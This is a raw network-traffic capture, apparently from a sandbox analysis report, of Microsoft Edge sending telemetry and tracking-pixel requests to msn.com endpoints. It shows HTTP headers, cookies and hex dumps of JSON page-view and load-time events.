                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 58a45bf3f07dfdca95ebcb7935e84994.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK50-P5
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 16weZwlgi0UV_Ao8B1LVbaYWD3kI11vrvBIW5qeQfmGLuvdxOHQ4dA==


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                10192.168.2.75003652.168.117.1714432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252351081&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 3857
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC3857OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 37 54 31 32 3a 31 39 3a 31 31 2e 30 37 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 61 37 37 38 62 34 2d 38 63 38 61 2d 34 38 33 35 2d 39 32 38 61 2d 35 30 33 39 66 34 38 35 31 61 37 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 35 36 31 39 31 38 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-07T12:19:11.076Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=600f6524608540b784d83ebb0e42ab87&HASH=600f&LV=202501&V=4&LU=1736252352112; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=05a1ab3628254374b09ce5392b468534; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 1031
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:11 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                11192.168.2.75004620.110.205.1194432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC1261OUTGET /c.gif?rnd=1736252351083&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cd8507b94268428491b16cc06b6a4f34&activityId=cd8507b94268428491b16cc06b6a4f34&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50B43BAE0D944675912718075641D4BF&MUID=040C031DFB13691C1F601670FA61685C HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MUID=040C031DFB13691C1F601670FA61685C; domain=.msn.com; expires=Sun, 01-Feb-2026 12:19:12 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                Set-Cookie: SRM_M=040C031DFB13691C1F601670FA61685C; domain=c.msn.com; expires=Sun, 01-Feb-2026 12:19:12 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Tue, 14-Jan-2025 12:19:12 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Tue, 07-Jan-2025 12:29:12 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:12 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Content-Length: 42
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                12192.168.2.75006752.168.117.1714432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354404&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 11894
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC11894OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 37 54 31 32 3a 31 39 3a 31 34 2e 34 30 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 61 37 37 38 62 34 2d 38 63 38 61 2d 34 38 33 35 2d 39 32 38 61 2d 35 30 33 39 66 34 38 35 31 61 37 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 35 36 31 39 31 38 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-07T12:19:14.401Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=cbb8026af83b4321879cf0be33a5dd58&HASH=cbb8&LV=202501&V=4&LU=1736252354884; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=73a17f325ba148d0af782e0156209f98; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 480
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:14 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                13192.168.2.75006852.168.117.1714432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354414&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 33609
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 37 54 31 32 3a 31 39 3a 31 34 2e 34 31 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 61 37 37 38 62 34 2d 38 63 38 61 2d 34 38 33 35 2d 39 32 38 61 2d 35 30 33 39 66 34 38 35 31 61 37 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 35 36 31 39 31 38 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-07T12:19:14.411Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC16384OUTData Raw: 22 64 61 74 61 22 3a 7b 22 62 61 73 65 54 79 70 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 42 61 73 65 22 2c 22 62 61 73 65 44 61 74 61 22 3a 7b 7d 2c 22 70 61 67 65 22 3a 7b 22 61 70 70 54 79 70 65 22 3a 22 65 64 67 65 43 68 72 6f 6d 69 75 6d 22 2c 22 63 61 6e 76 61 73 22 3a 22 42 72 6f 77 73 65 72 22 2c 22 63 6f 6e 66 69 67 22 3a 35 34 37 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 74 69 74 6c 65 22 3a 22 4e 65 77 20 74 61 62 22 2c 22 73 75 62 63 61 74 65 67 6f 72 79 22 3a 22 61 6e 74 70 22 2c 22 64 6f 6d 61 69 6e 49 64 22 3a 22 33 34 30 22 2c 22 76 65 72 74 69 63 61 6c 22 3a 22 68 6f 6d 65 70 61 67 65 22 2c 22 74 6f 70 69 63 22 3a 22 44 69 73 63 6f 76 65 72 22 7d 2c 22 69 73 41 64 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 73 41 75 74 6f 52 65
                                                                                                                                                                                                                                                                                                Data Ascii: "data":{"baseType":"MS.News.Web.Base","baseData":{},"page":{"appType":"edgeChromium","canvas":"Browser","config":547,"content":{"title":"New tab","subcategory":"antp","domainId":"340","vertical":"homepage","topic":"Discover"},"isAdEnabled":false,"isAutoRe
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:14 UTC841OUTData Raw: 3a 7b 22 73 69 7a 65 22 3a 35 33 39 35 30 2c 22 63 61 63 68 65 22 3a 30 7d 7d 7d 7d 2c 22 6f 74 68 65 72 22 3a 7b 22 74 79 70 65 22 3a 22 63 22 2c 22 63 68 69 6c 64 72 65 6e 22 3a 7b 22 5b 63 64 6e 5d 2f 73 74 61 74 69 63 73 2f 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 5f 6e 65 77 74 61 62 70 61 67 65 2e 70 6e 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22 2c 22 73 70 61 6e 73 22 3a 7b 22 6e 65 74 77 6f 72 6b 22 3a 5b 36 35 31 32 2c 35 31 36 5d 7d 2c 22 64 75 72 61 74 69 6f 6e 73 22 3a 7b 22 63 6f 6e 6e 65 63 74 22 3a 33 32 33 2c 22 72 65 71 75 65 73 74 22 3a 31 39 33 2c 22 63 64 6e 54 43 50 22 3a 38 36 2c 22 63 64 6e 53 65 6c 66 22 3a 30 2c 22 63 64 6e 4f 72 69 67 69 6e 22 3a 30 7d 2c 22 73 63 61 6c 61 72 73 22 3a 7b 22 73 69 7a 65 22 3a 36 35 34 2c 22 63 61 63
                                                                                                                                                                                                                                                                                                Data Ascii: :{"size":53950,"cache":0}}}},"other":{"type":"c","children":{"[cdn]/statics/icons/favicon_newtabpage.png":{"type":"o","spans":{"network":[6512,516]},"durations":{"connect":323,"request":193,"cdnTCP":86,"cdnSelf":0,"cdnOrigin":0},"scalars":{"size":654,"cac
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=d9e11fc38cd542069f3e02ae8ded3153&HASH=d9e1&LV=202501&V=4&LU=1736252354907; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=5094f43a8616409e84dd5c81668e40e1; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 493
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:14 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                14192.168.2.75006952.168.117.1714432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355017&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 5380
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC5380OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 37 54 31 32 3a 31 39 3a 31 35 2e 30 31 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 61 37 37 38 62 34 2d 38 63 38 61 2d 34 38 33 35 2d 39 32 38 61 2d 35 30 33 39 66 34 38 35 31 61 37 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 35 36 31 39 31 38 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-07T12:19:15.014Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"locale
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=e4c2617a9c6f48cd83891c85bf5111cb&HASH=e4c2&LV=202501&V=4&LU=1736252355518; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:15 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=0c98d3b8b8094535bc7734af3bea9ace; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:15 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 501
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
